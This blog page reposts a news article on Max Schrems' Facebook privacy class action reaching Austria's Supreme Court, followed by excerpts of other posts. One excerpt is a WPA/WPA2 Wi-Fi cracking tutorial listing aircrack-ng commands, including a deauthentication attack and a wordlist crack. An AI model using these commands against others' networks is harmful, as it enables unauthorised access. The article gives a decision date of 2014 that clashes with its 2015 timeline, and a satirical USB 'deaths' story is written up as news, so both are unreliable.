Skip to main content

Facebook ‘Class Action’ Privacy Lawsuit Moves To Austrian Supreme Court


A privacy lawsuit filed against Facebook last year by Viennese lawyer and data privacy activist Max Schrems has moved up to Austria’s Supreme Court which will rule on whether the suit can be treated as a class action.
When Schrems kicked off the suit, back in July 2014, he invited adult non-commercial Facebook users located anywhere outside the U.S. and Canada to join the suit for free — and tens of thousands of people quickly took up the invitation.
The legal action focuses on multiple areas where the plaintiffs argue Facebook has been violating EU data protection laws, such as the absence of effective consent to many types of data use; the tracking of Internet users through external websites; and the monitoring and analysis of users via big data systems. Facebook’s participation in the NSA’s PRISM surveillance program is also part of the complaint.
In July the case suffered a setback when an Austrian regional court ruled the suit inadmissible, saying it had “no jurisdiction” over the matter. However an appeals court subsequently ruled Schrems can file personal claims at his local court in Vienna, as he falls under the relevant consumer protection laws. But he’s still pushing for the suit to be heard as a class action.
The wider legal sticking point is over whether European courts will allow the bundling of similar claims into a formal class action — as Schrems has been hoping.
“It would not make a lot of sense for the court or the parties before it to file these claims as thousands of individual lawsuits — which we can still do if a ‘class action’ is not allowed. We therefore think that the ‘class action’ is not only legal but also the only reasonable way to deal with thousands of identical privacy violations by Facebook,” he argues in a statement.
At the time of writing Facebook had not responded to a request for comment on the case.
The Austrian Supreme Court will now rule on whether it agrees with Schrems’ logic on the class action point. It could also choose to refer the matter to Europe’s top court, the ECJ. But even if the Supreme Court will not allow a formal class action Schrems notes he can still file the action as a model case — so Facebook will have to answer his complaints in court, either way.
This October the privacy activist won a landmark legal victory at the ECJ when the court struck down a fifteen-year-old transatlantic data flows agreement (Safe Harbor) following another privacy-related case he brought against tech companies, including Facebook. In that action he had argued that data-sharing activities by commercial tech giants companies with the U.S. government’s mass surveillance programs violated fundamental European privacy rights. The ECJ agreed.
The Austrian Supreme Court is expected to make a decision on Schrems’ latest Facebook-related privacy suit at the beginning of 2014. After the admissibility of the lawsuit is decided, the Vienna Regional Court will then set a date for the first hearing.
Facebook is also embroiled in a privacy-related lawsuit in Belgium, following action taken by the national data protection authority. Earlier this month a court in Belgium imposed daily fines on Facebook if it did not change how its tracking cookies process the personal data of non-Facebook users. Facebook said it would be appealing that decision.
Facebook had sought to argue the Belgian courts had no jurisdiction over the tracking cookies matter because its European headquarters are sited in Ireland. However that argument was slapped down by the Belgian court.
The ECJ Safe Harbor strikedown has undoubtedly put more emphasis on European Union Member States’ national data protection authorities to rule on data protection issues.
The principle of legal jurisdiction for data protection matters being limited to authorities and courts where a company has its European headquarters has also been dealt a significant blow by several recent ECJ rulings. And data protection compliance for Facebook and other large tech companies operating across multiple European countries has quickly become a whole lot more complex.
Meanwhile, the European Commission is continuing talks with the U.S. to try to hammer out a new Safe Harbor framework to govern transatlantic data-flows — saying earlier this month that it wants a new deal to be agreed by January 2016. However it also said that securing such a deal will require the U.S. to enact more changes and reforms in its intelligence gathering and surveillance programs.

Comments

Popular posts from this blog

Building a smarter home

The Jetsons  presented a highly entertaining vision of what  homes  of the future would  look like . The animated television show anticipated a world where humans would be able to do everything with just the push of a button. In many ways, the show turned out to be prophetic; today we have printable food, video chats, smartwatches and robots that help with housework — and flying cars may even be on the way. The challenge for companies is to integrate digital technologies in meaningful ways that enhance people’s  homes  and improve their lives. Many of the innovations to emerge over the past few years have been geared toward this kind of “push-button living.” Thanks to the rise of smartphones and the proliferation of cheap sensors, it is possible to make just about any household appliance “smart” and “connected.” By 2019,  companies are expected to ship 1.9 billion connected home devices, bringing in about $490 billion in revenue. ...

Oculus’ New $99 Samsung Gear VR Makes Serious Virtual Reality Affordable

At half the price of its last mobile VR headset, the new $99  Oculus-made  Samsung Gear VR is cheap enough to unlock virtual reality for the mainstream. Revealed today at the Oculus Connect conference, it works with the whole 2015 line of Samsung Smartphones including the Note 5, S6, S6 Edge, and S6 Edge+. It will ship in November in time for Black Friday. Compared to the $199 previous Gear VRs that only worked with fewer phones, this headset will be a lot more accessible. The new Gear VR is 22% lighter, making it more comfortable to wear. The trackpad on the temple of the headset also now has a tactile directional pad on it so your finger will know where it’s touching. The previous Gear VRs had a smooth trackpad and sometimes it was to tough to know if you were touching it or just the unsensitive shell of the headset when you couldn’t see for yourself. There’s also a new Gear VR Gamepad which all the Oculus Connect conference attendees will get for free. It features an...

Careless USB removal causes multiple deaths

EIGHTEEN workers have died after a USB stick was removed from a computer without adequate precautions. The offices of Hereford-based Envision Photography were completely destroyed in the ensuing blast. Survivor Norman Steele said: “My colleague Helen had put some files on the stick to work on at home, and she yanked it out of the computer before anyone could scream ‘no’. “I kicked her aside as a jet of white-hot flame belched out of the USB port and set fire to the desk opposite. “Grabbing her, I dived through the window just before all the PCs in the network exploded with purple electricity that fried everyone in the building. “I sprinted to my car, knowing that the printers were already becoming merciless hunter-killer drones, shouting for Helen to follow. “But when I looked round I saw her frozen, something glowing in her hand, the awareness dawning of her fate. She was still holding the USB. “She detonated in a flash of ultraviolet light that turned eve...

Crack WPA & WPA2 with Aircrack-ng on Kali Linux

In this tutorial we are going to teach you How to crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only. Things we used for cracking WPA & WPA2: Alfa AWUSO36H Wireless Card Windows 7-64bit (works on 32bit) VMware Workstation Kali Linux 2.0 Command to crack WPA & WPA2: airmon-ng  sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0  airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0 aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap sudo ifconfig wlan0 down sudo iwcofnig wlan0 mode monitor sudo ifconfig wlan0 up  Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux: In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.